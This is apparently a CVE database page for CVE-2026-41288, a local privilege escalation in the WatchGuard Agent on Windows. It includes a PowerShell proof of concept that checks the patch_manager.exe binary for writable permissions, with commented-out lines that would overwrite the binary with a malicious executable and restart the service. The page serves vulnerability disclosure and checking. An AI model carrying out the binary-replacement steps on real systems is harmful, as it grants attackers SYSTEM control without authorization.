Security Vulnerability Report
CVE-2026-41288 CVSS 7.8 HIGH

CVE-2026-41288

Published: 2026-05-06 16:16:10
Last Modified: 2026-05-11 18:35:42
Source: 5d1c2695-1a31-4499-88ae-e847036fd7e3

Description

Incorrect permission assignment for a resource in the patch management component of the WatchGuard Agent on Windows allows an authenticated local user to elevate their privileges to NT AUTHORITY\SYSTEM.

CVSS Details

CVSS Score: 7.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:watchguard:agent:*:*:*:*:*:windows:*:* - VULNERABLE
Please refer to the official advisory WGSA-2026-00011

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
powershell
# PoC for CVE-2026-41288: WatchGuard Agent Local Privilege Escalation
# This script demonstrates checking for weak permissions on a service binary.
$TargetFile = "C:\Program Files\WatchGuard\WatchGuard Agent\patch_manager.exe"
$CurrentUser = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name
# Rights that allow the file's contents to be changed (also included in Write, Modify and FullControl)
$WriteMask = [int][System.Security.AccessControl.FileSystemRights]::WriteData -bor [int][System.Security.AccessControl.FileSystemRights]::AppendData
Write-Host "[*] Checking permissions for: $TargetFile"
try {
    # -ErrorAction Stop makes a missing file or denied access reach the catch block
    $Acl = Get-Acl -Path $TargetFile -ErrorAction Stop
    # Check, rule by rule, if 'Everyone' or current user has Write access
    $WeakRules = @($Acl.Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        (([int]$_.FileSystemRights -band $WriteMask) -ne 0) -and
        ($_.IdentityReference.Value -eq 'Everyone' -or $_.IdentityReference.Value -eq $CurrentUser)
    })
    if ($WeakRules.Count -gt 0) {
        Write-Host "[+] Vulnerable! Write permissions detected."
        Write-Host "[*] An attacker could replace the binary to gain SYSTEM privileges."
        # Simulated exploitation (commented out)
        # Copy-Item "malicious.exe" -Destination $TargetFile -Force
        # Restart-Service -Name "WatchGuardPatchSvc"
    } else {
        Write-Host "[-] No obvious write permissions found for the current user."
    }
} catch {
    Write-Host "[-] Error accessing file: $_"
}

References

https://www.watchguard.com/wgrd-psirt/advisory/WGSA-2026-00011

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-41288", "sourceIdentifier": "5d1c2695-1a31-4499-88ae-e847036fd7e3", "published": "2026-05-06T16:16:10.147", "lastModified": "2026-05-11T18:35:41.823", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Incorrect permission assignment for a resource in the patch management component of the WatchGuard Agent on Windows allows an authenticated local user to elevate their privileges to NT AUTHORITY\\\\SYSTEM."}], "metrics": {"cvssMetricV40": [{"source": "5d1c2695-1a31-4499-88ae-e847036fd7e3", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": 
"NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "5d1c2695-1a31-4499-88ae-e847036fd7e3", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-732"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:watchguard:agent:*:*:*:*:*:windows:*:*", "versionEndExcluding": "1.25.03.0000", "matchCriteriaId": "1D391721-7499-4701-A84D-C58CD093CCB0"}]}]}], "references": [{"url": "https://www.watchguard.com/wgrd-psirt/advisory/WGSA-2026-00011", "source": "5d1c2695-1a31-4499-88ae-e847036fd7e3", "tags": ["Not Applicable"]}]}}